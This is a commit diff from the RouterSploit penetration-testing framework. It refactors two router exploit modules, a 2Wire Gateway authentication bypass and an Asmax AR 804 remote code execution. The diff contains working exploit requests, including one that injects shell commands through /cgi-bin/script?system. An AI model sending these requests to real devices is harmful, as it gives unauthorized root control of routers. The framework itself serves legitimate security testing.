Utilize widgets in a few exploits.

3862604e · fwkz · b1e77def · 3862604e · 3862604e
Commit 3862604e authored May 11, 2016 by fwkz
Hide whitespace changes
Inline Side-by-side

Showing with 16 additions and 13 deletions

gateway_auth_bypass.py routersploit/modules/exploits/2wire/gateway_auth_bypass.py +10 -8

ar_804_gu_rce.py routersploit/modules/exploits/asmax/ar_804_gu_rce.py +6 -5

No files found.
--- a/routersploit/modules/exploits/2wire/gateway_auth_bypass.py
+++ b/routersploit/modules/exploits/2wire/gateway_auth_bypass.py
@@ -2,9 +2,10 @@ from routersploit import (
    exploits,
    print_success,
    print_error,
-    sanitize_url,
+    print_info,
    http_request,
    mute,
+    widgets,
 )


@@ -15,7 +16,8 @@ class Exploit(exploits.Exploit):
    """
    __info__ = {
        'name': '2Wire Gateway Auth Bypass',
-        'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. If the target is vulnerable link to bypass authentication is provided.',
+        'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. '
+                       'If the target is vulnerable link to bypass authentication is provided.',
        'authors': [
            'bugz',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -30,14 +32,14 @@ class Exploit(exploits.Exploit):
        ],
    }

-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', widgets=widgets.url)  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
-            print "\nUse your browser:"
-            print "{}:{}/xslt".format(self.target, self.port)
+            print_info("\nUse your browser:")
+            print_info("{}:{}/xslt".format(self.target, self.port))
        else:
            print_error("Target seems to be not vulnerable")

@@ -46,7 +48,7 @@ class Exploit(exploits.Exploit):
        mark = '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">'

        # checking if the target is valid
-        url = sanitize_url("{}:{}/".format(self.target, self.port))
+        url = "{}:{}/".format(self.target, self.port)
        
        response = http_request(method="GET", url=url)
        if response is None:
@@ -55,8 +57,8 @@ class Exploit(exploits.Exploit):
        if mark not in response.text:
            return False  # target is not vulnerable

-        # checking if authentication can be baypassed
-        url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
+        # checking if authentication can be bypassed
+        url = "{}:{}/xslt".format(self.target, self.port)
        
        response = http_request(method="GET", url=url)
        if response is None:

--- a/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
+++ b/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
@@ -5,10 +5,10 @@ from routersploit import (
    print_success,
    print_status,
    print_error,
-    sanitize_url,
    http_request,
    random_text,
    mute,
+    widgets,
 )


@@ -23,7 +23,8 @@ class Exploit(exploits.Exploit):
             'Michal Sajdak <michal.sajdak[at]securitum.com>',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
-        'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
+        'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which '
+                       'allows executing command on operating system level with root privileges.',
        'references': [
             'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
             'https://www.exploit-db.com/exploits/8846/',
@@ -33,7 +34,7 @@ class Exploit(exploits.Exploit):
        ],
    }

-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', widgets=widgets.url)
    port = exploits.Option(80, 'Target Port')

    def run(self):
@@ -54,7 +55,7 @@ class Exploit(exploits.Exploit):
            print self.execute(cmd)

    def execute(self, cmd):
-        url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
+        url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)

        response = http_request(method="GET", url=url)
        if response is None:
@@ -68,7 +69,7 @@ class Exploit(exploits.Exploit):
        solution = number - 1

        cmd = "echo $(({}-1))".format(number)
-        url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
+        url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)

        response = http_request(method="GET", url=url)
        if response is None: